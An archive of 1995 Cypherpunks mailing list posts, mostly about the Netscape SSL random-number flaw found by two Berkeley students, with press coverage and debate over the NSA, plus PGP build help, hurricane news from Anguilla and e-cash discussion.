http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 19:22:18 PDT
To: cypherpunks@toad.com
Subject: Re: Caribbean Internet Services? (fwd)
Message-ID: <ac83779c0e02100492d6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:00 AM 9/19/95, Jim Choate wrote:

>> ObCypherpunks Relevance: A couple of past or current list members have
>> nascent Internet plans in some of these islands. (I think one of them is
>> way south, just off Venezuela.)
>>
>> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>> they were a few months ago.
>>
>
>Satellite dishes and a steady supply of gasoline via a couple of tankers
>would make such an operation completely portable. A more ideal solution
>would be to moore a ship in international waters (wasn't some group wanting
>to do this for 'humanitarian' reasons or somesuch?).

Sure, there are possible fixes to the various problems. I'm not saying the
Caribbean will shut down, only that this will likely increase operating
costs, in at least some of the areas, and will frighten off some investors.
Human nature.

The model need not be physical sites in these locales, of course. But even
maintaining a business office in some of these locales will be a hassle.

(This is where I expect the usual folks will jump in and shout "On the
contrary!" Note however, how few of them actually live in St. Barts, or
Anguilla, or Curacao, or the Bahamas.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Mon, 18 Sep 95 19:45:22 PDT
To: "Bret A. Johnson" <bret@bjohns.win.net>
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <1818@bjohns.win.net>
Message-ID: <Pine.OSF.3.91j.950918193444.3251B-100000@saul3.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Bret A. Johnson wrote:

> Can anyone tell me where a version of PGP 2.62 can be found for Linux?
> I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not
> get it) to compile on my system..

It compiled on mine just fine. Be sure you have an up to date
bintools and gcc.

1. Make sure you are using 2.5.2/2.6.3. Thats how I compiled mine.
2. Unzip the source in /usr/src/pgp (or whereever)
3. cd /usr/src/pgp/rsaref/install/unix
4. make
5. cd /usr/src/pgp/src
6. make linux

And you should have a pgp binary.

7. cp /usr/src/pgp/src/pgp /usr/local/bin/pgp

Though they might differ, the MD5 hash of my Linux version is 
f7dd657c0c5ed8a5cb7c5dfcf5af6c5b.

Good luck!

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 18 Sep 95 17:49:58 PDT
To: cypherpunks@toad.com
Subject: Caribbean Internet Services? (fwd)
Message-ID: <199509190100.UAA00247@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> To: cypherpunks@toad.com
> From: tcmay@got.net (Timothy C. May)
> Subject: Caribbean Internet Services?
> 
> A brief note, though the hardship to the Caribbean islands will not be brief.
> St. Thomas, St. Croix, and other islands were hit extremely hard by
> hurricane Marilyn. Previous hurricanes, including Luis, also hit some of
> the islands.
> 
> ObCypherpunks Relevance: A couple of past or current list members have
> nascent Internet plans in some of these islands. (I think one of them is
> way south, just off Venezuela.)
> 
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> they were a few months ago.
> 

Satellite dishes and a steady supply of gasoline via a couple of tankers
would make such an operation completely portable. A more ideal solution
would be to moore a ship in international waters (wasn't some group wanting
to do this for 'humanitarian' reasons or somesuch?).

                                               Jim Choate




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 17:51:27 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Caribbean Internet Services?
In-Reply-To: <ac835f9008021004ec69@[205.199.118.202]>
Message-ID: <199509190051.UAA01037@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Power in St. Thomas may not be back for a year in some parts. The roads,
> sewers, power lines, phone system, etc. will likely have to be completely
> rebuilt.
[...]
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> they were a few months ago.

Not really. I suspect that phone company co-location and using buried
lines and your own generator would probably fix most problems if you
were "serious" about doing such a thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Mon, 18 Sep 95 20:50:14 PDT
To: cypherpunks@toad.com
Subject: Musings
Message-ID: <199509190256.UAA00267@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I noticed Sameer's release had some nice shots at ITAR. Heh. When aiming
for outsiders, it might be productive to explain what cpunks do in a I'm-
ok-you're-ok sorta way. For example, "the cryptographic research group 
'cypherpunks'..."

ObHackNetscape:

I was thinking last night about the process of verifying that someone
had swept the keyspace that they claimed to have swept. (Umm, well,
so much for Mozilla, but ya know, next time...) and I wanted to run
this idea past Those Who Know[tm]:

When doling out a segment of 16M keys, attach results of two randomly
chosen garbage decryptions. The bruter has to report back which two keys
they are. The overhead would add up, but I don't think it would be
significant. Or if a stronger method is needed, provide the MD5 hash
of the garbage decryptions. Maybe with a discriminator or something, so
you only MD5 a few thousand.

Anyway, the idea is that if you have to prove that you swept a big
enough chunk to find the two keys, you've proven that you've swept
a great portion of the keyspace. Of course, this does nothing to
prevent _withholding_ a result. But it does prove that most of the 
keyspace has been swept; and most likely the search continued even after 
the two keys are found. 

This would make it much more possible to give consolation prizes without 
worrying about false NAKs of big segments. If anyone is still interested 
in that idea.

ObFactoring:

Picked up the Quadratic Sieve factoring program from Mathworks. Haven't
had a chance to compile it yet, but Bob Silverman told me in email he
was willing to make it available to a group such as [The Cryptographic 
Research Foundation] Cyperpunks.

ObHamilton '95:

Pulled up my tomorrow's stock pages. Netscape takes a big hit, but not
big enough for a foolish thing like that. I hope none of my banks go 
around setting their safe combinations to 1234 or anything...  ;|

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMF4xO8La+QKZS485AQFQtQL/f9bmpnGT/3FfB2rqnFmMltJEkgY8/Oym
Vtkzm6xrlApY7b9b2UhVvPXurHU8DBAZeqj5Yu7VvLsQ+w3YelGEAYfzdhECk2t/
5NRYi0RkgFkIs+XCuDGVkoSXExT++KsZ
=V54e
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Mon, 18 Sep 95 21:17:59 PDT
To: cypherpunks@toad.com
Subject: Bidzos takes advantage of Netscape hole!
Message-ID: <9509190017.aa08714@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


The following article has a quote from Bidzos claiming that they offered to
review the code but that Netscape declined.  Of course the good student is
going to have them review it...  

   How about having the Goldberg and Wagner review it for some bucks!!!

     2
-- C  --
----------------------------------------------------------
Netscape's Internet Software Contains
 Flaw That Jeopardizes Security of Data

 By JARED SANDBERG
 Staff Reporter of The Wall Street Journal 

 A serious security flaw has been found in Netscape Communications
 Corp.'s Internet software, jeopardizing sensitive financial data such as
 credit-card numbers that users pass over the global computer network. 

 The company acknowledged the flaw and said it's issuing a software fix. But
 as is often the case with Internet security, it may take time for users to
adopt
 the fix, leaving them vulnerable meanwhile. 

 "It's a very big trapdoor," said Dietrich Kappe, a partner with Red Planet
 L.L.C., an Chicago Internet consulting firm. "You can drive a truck through
 it. Somebody goofed" at Netscape, he added. 

 The breach presents a problem for Netscape, which produces the most
 popular software for browsing the World Wide Web, the multimedia portion
 of the Internet where businesses are setting up electronic storefronts to sell
 goods and services. Netscape has captured roughly 75% of the "browser"
 market, reaching roughly eight million people, who use the Netscape
 product to browse the Web and make credit-card purchases. The breach
 also underscores the persistent security problems that have plagued the
 Internet and forestalled electronic commerce. 

 Netscape uses so-called symmetric key cryptography to scramble sensitive
 data so that they are unreadable by hackers snooping on the network. That
 key is essentially a mathematical formula so long that it makes it impractical
 for hackers to crack, even with powerful computers. The formula is
 generated by a random number that may be determined by the number of
 electronic-mail messages, for example. Netscape's software chooses a
 number between one and two-to-the-30th-power -- or roughly one billion. 

 But on Sunday night, two graduate students at the University of California at
 Berkeley posted a message to the Internet's "Cypherpunks" mailing list, a
 group of mathematicians and programmers who discuss the science of
 cryptography. In the electronic missive, they said that the random number
 that generates the mathematical key was "fairly trivial to guess" and that the
 key "usually takes less than one minute to find." 

 Rather than try to break the encryption "key," the two graduate students
 examined the so-called "random number generator" and discovered that the
 number isn't so random, allowing them to guess the encryption key. It took
 the two students, Ian Goldberg and David Wagner, two days to identify the
 vulnerability and write a software program that could guess the encryption
 key in less than one minute. 

 Netscape's software, said Mr. Goldberg, 22 years old, "is not as good as
 people thought, which is probably worse than no security" since people have
 a false sense of security as they enter payment details. 

 "The information we were using to create the key is now a known set of
 information," said Jeffrey Treuhaft, security product manager for Netscape.
 "We feel it's important to let our consumers know," he said, adding that the
 company will post a warning on its own Web site. 

 "It's a serious hole, but it can easily be corrected," said James Bidzos,
 president of RSA Data Security Inc., which licenses security technology that
 Netscape incorporates in its system. Netscape said it plans to have a
 software fix to resolve the problem available for downloading over the
 Internet by the end of this week. 

 RSA's Mr. Bidzos said his company offered to review Netscape's security
 when it first introduced its browser, but Netscape declined. "They're asking
 us to review it this time," he said. 

 A month ago, a student at France's Ecole Polytechnique cracked the same
 weaker encryption system that U.S. government policy forces Netscape to
 use in a foreign version of its Navigator software. To break the code, the
 student used 120 computer workstations and two supercomputers working
 for eight days to break the so-called 40-bit encryption system, a number
 that refers to length of the encoding "key," which is used to scramble data. 

 Netscape sells a far stronger version of its software that includes 128-bit
 key length, but is prevented by the government from distributing it on the
 Internet. The government fears that such strong encryption could fall into the
 hands of terrorists who might use it to communicate without fear of being
 tapped by U.S. security agencies. Security experts, however, noted that the
 same problem exists with the stronger software. 

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 18:11:11 PDT
To: technomads@UCSD.EDU
Subject: Vince Cate is Breathing ;-)
Message-ID: <v02120d02ac83c1c56ba2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I think I can be foregiven for sharing a little private mail interchange I
just had with Vince Cate, the Anguillan ex-cypherpunk/technomad, who's
digging out from under Hurricane Luis...

Cheers,
Bob Hettinga

--- begin forwarded text

Date: Mon, 18 Sep 1995 13:47:36 +24000
From: Vincent Cate <vince@offshore.com.ai>
Subject: Re: How are you doing?
To: Robert Hettinga <rah@shipwright.com>
MIME-Version: 1.0



> I figure by now the phone lines might be up, though I had heard there was
> only one line up on Anguilla the day after.
>
> Can we do anything here to help?

I am not sure if my other mail made it.

Ya, the roof blew off of the phone company and also the electric company.
All the phone company could do was set up an inmarsat phone line and
charge $60/min to make calls.

Thanks.  I can't think of anything I need.  Unless you know who sells
directional cell phone antennas.

Thanks!

   --  Vince
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Sep 95 18:10:08 PDT
To: cypherpunks@toad.com
Subject: NYT on Netscape SSL Crack
Message-ID: <199509190110.VAA20649@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


WQXR, the New York Times radio station, just reported on the 
crack, citing Markoff's article tomorrow. Says Netscape plans a 
fix, perhaps as early as tomorrow.


We'll get a late-night copy and post it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 18 Sep 95 19:16:52 PDT
To: cypherpunks@toad.com
Subject: John Young You are KEWL!
Message-ID: <199509190216.TAA05926@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


It is really nice what you're doing here.
It is appreciated.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 21:23:36 PDT
To: cypherpunks@toad.com
Subject: NSA and Netscape Crack (Re: NYT on Netscape Crack)
Message-ID: <ac8391c012021004b6fc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:00 AM 9/19/95, John Young wrote:
>   The New York Times, September 19, 1995, pp. A1, D21.
>
>
>   Security Flaw Is Discovered In Software Used in Shopping
>
>   By John Markoff

>   The discovery is the second reported security weakness in
>   the Netscape program to be posted on the Cypherpunks list
>   in the last month. In August, Damien Doligez, a student at

Seriously, where's the NSA when you really need 'em?

If the "flaws" are being found by our group, as John notes, just what is
the NSA doing in the _second_ role it is supposed to have, it's "COMSEC,"
or communications security, role?

(Note: As outlined by Bamford, and others, the Agency has a dual role:
penetrating communications it is chartered to penetrate, and helping to
secure communications it is chartered to help secure. Traditionally, the
penetrating side is called SIGINT or COMINT, and the securing side is
called COMSEC. The names may have changed by now.)

Personally, I don't actually _want_ them vetting the work of others, but I
think this whole series of events with Netscape makes it abundantly clear
that the supposed "dual role" of the NSA in both breaking ciphers and in
ensuring higher security is a farce.

If the NSA had not found the flaws our two Berkeley grad students found,
we've grossly overestimated them as a threat. And if they found the flaws
but said nothing, what does this say about their claimed COMSEC benefits to
American interests? (Granted, not all of us are Americans, but I think you
understand my point about the NSA claiming it has a role, then doing
nothing concrete, and even being misleading in its plans and programs.)

If the NSA _really_ wants to really help secure communications against
fraud, eavesdroppers, and foreign intelligence agencies, it can do so by
immediately relaxing the restrictions on crypto export. While this may not
stop things like weak random number generators, it moves us to an era of
"strong" crypto and away from the "toy" crypto the NSA seems to want us to
have.

I think, however, it's clear by now that they have little interest in
helping to secure communications and that weak "toy" systems are their
preference.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 18 Sep 95 20:57:24 PDT
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Good random seeds
In-Reply-To: <199509182042.QAA02146@homeport.org>
Message-ID: <199509190357.VAA22661@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




Adam Shostack writes:

> 	Since we can all see how badly time works, I'd like to point out
> that Will Price, author of the excellent Cryptdisk utility for the Mac,
> uses mouse movements to seed his PRNG.
> 
> 	His code is available for a small fee, and I'd strongly suggest
> that people who need good, easy PRNs take a look at it, and also take a

Just to clear up a point of attribution, the core random number generator
used by CryptDisk was designed and written by Colin Plumb, with a wrapper
for the Macintosh written by me. Will (Price) told me that he has made
some improvements to my original implementation for the latest version
of CryptDisk, doing the clock timings more simply.

My code and Colin's are free, and I'd be happy to post the routines if there 
is interest.

                                   -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 22:02:45 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <199509190457.VAA20451@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how its done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

	Once netscape is patched with a stronger PRNG if someone can
crack -that- one too, then they will get a T-shirt as well. Perhaps I
should offer the t-shirt for just revealing the algorithim used w/o
actually cracking it, just to deal with that statement from "Netscape
officials".
	I emphasized in my conversation with the SFChronicle today
that 'security by obscurity' doesn't work. Hopefully that will be
reflected in the article.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Mon, 18 Sep 95 22:07:06 PDT
To: Sal@panix.com (Sal Denaro)
Subject: Re: AOL monitoring
Message-ID: <v01530515ac840d90f0d8@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


>Ohhh-God, not again...
>
>Can anyone remember the Prodigy rumor? How IBM was snooping around
>your hard disk, and it turned out to be nothing but a swapfile. Does
>"Good times" ring a bell? And don't get me started on MicroSoft
>Network rumors...
>
>1) 90% of the FTP sites I use mention that they log xfers.
>
>2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600
>
>3) My address book shows who I send mail often enough to warrent me
>   putting in a nickname.
>
>4) My sent-mail folder shows who I sent mail to in the past year.
>
>5) My bookmark file shows that I read the NYC-Speedtraps page one or
>   two time a week.

Zterm and Anarchie both default to logging transfers. AOL on the Mac has a
button on the download manager that lets you view a list of items you have
downloaded.

It's everywhere.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Mon, 18 Sep 95 19:15:20 PDT
To: cypherpunks@toad.com
Subject: PGP for Linux 1.2.8
Message-ID: <1818@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone tell me where a version of PGP 2.62 can be found for Linux?
I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not
get it) to compile on my system..


Thanks...

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Mon, 18 Sep 95 19:10:21 PDT
To: sameer <sameer@c2.org>
Subject: Re: Hack Netscape!
In-Reply-To: <199509190106.SAA02447@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950918220842.9126A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, sameer wrote:

> 	The T-shirt isn't designed yet but I think the web page can
> take public consumption now. Check out http://www.c2.org/hacknetscape

Heh, what about a shirt for the people who worked through keyspace for 
the second crack? ;)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 22:11:56 PDT
To: cypherpunks@toad.com
Subject: Re: taxonomies of 'real money' and e-cash
Message-ID: <ac839dbd1502100487f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 9/18/95, P.J. Ponder wrote:

...
> Maybe I'm missing the larger point, but isn't it accurate that in the
>digital world, one protocol or procedure may take the place of perhaps
>several of the 'real-world' procedures or protocols?  An effective
>mechanism of signing with non-repudiation that was recognized as binding
>on the signer would permit 'checks', 'promissory notes', 'IOUs', and

I wasn't saying they are all on the same footing, or are all separate and
compartmentalizable things. Clearly some of them are just slightly
different "flavors" of other things. I listed a bunch of them not as a
taxonomy or ontology, but as an illustration that there are many kinds of
financial dealings, many kinds of roles played.

That the real world has so many flavors of financial things could of course
be due to inertia and ignorance, partly. But there are also different
functionalities, and costs. Fitting the different needs, the different
roles of the players. I won't go on and on, as my last post on this I think
hit the main points, but consider how many flavors we have just of
"checks": the "ordinary" checks we write, counter checks, dual-endorser
checks, traveller's checks, and so on. (If you are arguing that only
"digital cash" is a real issue, and all other constructs are "small matters
of programming," then we disagree profoundly.)


>'warrants'.  Some of the other species listed in your post aren't really
>money, anyway.  They are things you can buy with money, like stock
>certificates or Maseratis.  One could conceivably buy convertible
>debentures with e-cash, the same as one could buy them with 'real money',
>but it doesn't follow that there should be some one-to-one mapping of real
>money objects and classes onto electronic analogues.  Once again, i've
>probably missed the forest, but a couple of the trees distracted me.

I don't get your point at all. I didn't claim they were all "money,"
whatver we may mean by _that_ loaded term, but that they are "things" with
important features. And even your example of a thing like a "stock
certificate" is not quite as simple as a thing like a "Maserati."

My belief is counter to yours: I believe many or even most of the financial
things and instruments we deal with today will be mapped into "digital
economy" versions, albeit with new wrinkles and perhaps new names.

(I could cite many examples of protocols that cannot be automated for use
by agents if the only carry-over is "digital cash." Voting of shares,
endorsements on instruments, various kinds of guarantees, reputations, and
so on.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 18 Sep 95 19:25:07 PDT
To: bret@bjohns.win.net (Bret A. Johnson)
Subject: Re: PGP for Linux 1.2.8
In-Reply-To: <1818@bjohns.win.net>
Message-ID: <199509190224.WAA03110@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.  PGP 2.6.2 compiles out-of-the-box on Linux.  In fact, Linux is my
personal development platform at home, so I make sure that it works.
Just "make" in rsaref/install/unix, and then "make linux" in src.

If you are in the US or Canada, you can get PGP 2.6.2 from MIT.  Here
are the instructions:

The file ftp://net-dist.mit.edu/pub/PGP/README contains instructions
on how to download PGP 2.6.2.  Included therein are Binaries for DOS
and Mac, and the sources for DOS, Unix and Mac.  To read these files
you should log in with username anonymous and use your email address
as the password.

Alternatively, you can use the WWW interface to get to these packages.
Just connect to the PGP-form web page and follow the instructions:
	http://bs.mit.edu:8001/pgp-form.html

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick.Sciorra@hudson.lm.com
Date: Mon, 18 Sep 95 23:17:18 PDT
Subject: Automatic E-Mail
Message-ID: <43khtu$bis@news1.warwick.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of an E-Mail package that will automatically connect
to the Internet and retreive mail at specific intervals?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 20:15:33 PDT
To: cypherpunks@toad.com
Subject: Hurricane Luis in Anguilla / Cellphone Antenna
Message-ID: <v02120d00ac83e18d8f6f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 18 Sep 1995 13:24:33 +24000
From: Vincent Cate <vince@offshore.com.ai>
Subject: Hurricane Luis in Anguilla / Cellphone Antenna
To: Steve Roberts <wordy@qualcomm.com>
cc: Technomads <technomads@UCSD.EDU>
MIME-Version: 1.0



Hurricane Luis took Anguilla apart.  The three utility polls right near my
house all blew down.  My house, computers, etc are all fine.

Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems
there were many people killed.  They have a lot of poor people there
and also a lot of people used to live in boats.  More than 1,000 of
about  1,400 boats sank.

They eye went right over Anguilla.  For awhile it was calm enough that
everyone went outside to stretch and say hi to everyone.  Overall it
took about 4 days to pass.

It has been nice to have solar pannels, batteries, an interter, etc. I did
not have a cellphone, but I do now.

And now that I have one I am really interested in the directional antenna
that might let me reach other islands - in particular the US Virgin
islands where long distance rates are $0.10/min at night with sprint
instead of the $2/min that we pay here in Anguilla.  Does anyone know
where I can order a directional cellphone antenna (boat antenna) good for
100 miles?

  --  Vince
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Sep 95 20:35:19 PDT
To: cypherpunks@toad.com
Subject: NYT on Netscape Crack
Message-ID: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 19, 1995, pp. A1, D21.


   Security Flaw Is Discovered In Software Used in Shopping

   By John Markoff


   San Francisco, Sept. 18 -- A serious security flaw has been
   discovered in Netscape, the most popular software used for
   computer transactions over the Internet's World Wide Web,
   threatening to cast a chill over the emerging market for
   electronic commerce.

   The flaw, which could enable a knowledgeable criminal to
   use a computer to break Netscape's security coding system
   in less than a minute, means that no one using the software
   can be certain of protecting credit card information, bank
   account numbers or other types of information that Netscape
   is supposed to keep private during on-line transactions.

   The weakness was identified by two first-year graduate
   students in computer science at the University of
   California at Berkeley, who published their findings on an
   Internet mailing list Sunday evening.

   Although the Netscape Communications Corporation, which
   produces the software, said today that the flaw could be
   fixed and that new copies of the software would be
   distributed as early as next week, Internet experts said
   the discovery underscored the danger of assuming that any
   computer security system was safe.

   "There needs to be much more public auditability in the way
   these financial security systems are designed and
   implemented," said Eric Hughes, president of Open Financial
   Networks, a company in Berkeley that is developing Internet
   commerce systems.

   The Netscape software is already used by an estimated eight
   million people for navigating the World Wide Web portion of
   the Internet. On the Web, thousands of companies offer
   text, images, video and audio information, much of it as a
   way of advertising or directly selling goods and services.
   Because the Netscape software is not only easy to use but
   has also been promoted as a secure way of dealing with
   personal and financial information, it has been seen as the
   emerging de facto standard for on-line commerce.

   Already, a diverse group of companies -- including Wells
   Fargo Bank, MCI Communications, Internet Shopping Network
   and Virtual Vineyards -- have adopted Netscape as the
   vehicle for checking bank balances, catalogue shopping or
   buying wine on line.

   Although Internet experts agreed with the company's
   assessment that the flaw could be fixed and that it posed
   no risk to people who use the World Wide Web only to
   retrieve nonsensitive data, the security problem's
   disclosure may represent a public relations setback for
   Netscape Communications and an inconvenience to millions of
   people who may feel a need to replace the version of
   Netscape installed on their computers. Last month the
   company's shares began public trading and had one of the
   most successful first days in Wall Street's history,
   largely on the resounding popularity of the Netscape
   software.

   Today, as word of the security flaw circulated only within
   fairly small circles of Internet users, Netscape's stock
   closed with a slight loss, down 75 cents, to $52.50, in low
   Nasdaq trading volume.

   The company said it would release a repaired version of the
   software within a week. Users will be able to download it
   free over the Internet, through the Netscape site on the
   World Wide Web (http://home.netscape.com).

   The company had previously announced a next-generation
   version of Netscape that it said would be more secure than
   the original, and it said today that it would release this
   updated version within the next few weeks. But first it
   will remove the newly disclosed flaw, which is currently in
   the new version.

   "The good news and the bad news of the Internet is that
   when you put something up there, many more people can test
   it," said Mike Homer, the vice president of marketing at
   Netscape. "You also give yourself the opportunity of having
   people point things out which you can fix quickly."

   The company so far has distributed most copies of its
   program free over the Internet, under a strategy of making
   its money from commercial customers who use Netscape to
   provide services or for other business applications over
   the World Wide Web. So replacing the copies will not be an
   expensive undertaking.

   Instead, for Netscape Communications and for other
   companies betting their futures on the Internet, the real
   cost of this disclosure may be in the public's shaken
   confidence in the ability of computer companies to insure
   privacy and security for on-line commerce.

   The weakness in Netscape's security was discovered by Ian
   Goldberg, 22, and David Wagner, 21, two computer science
   students who share an office at the university and who also
